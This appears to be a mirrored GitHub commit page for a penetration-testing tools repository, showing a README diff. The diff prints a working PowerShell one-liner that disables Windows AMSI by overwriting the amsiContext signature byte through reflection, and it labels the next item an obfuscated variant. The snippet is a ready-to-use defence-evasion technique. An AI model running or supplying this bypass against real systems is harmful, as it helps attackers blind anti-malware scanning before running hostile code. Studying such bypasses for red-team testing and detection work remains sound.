mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 02:21:36 +01:00
Update README.md
This commit is contained in:
parent
d4f6d0fc80
commit
d0738d5a61
@ -83,7 +83,7 @@ amsiInitFailed
|
|||||||
* Technique 1A: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
|
* Technique 1A: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
|
||||||
```
|
```
|
||||||
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
||||||
```
|
```
|
||||||
|
|
||||||
* Technique 1B: Same as 1A, but obfuscated variant. (256 bytes)
|
* Technique 1B: Same as 1A, but obfuscated variant. (256 bytes)
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user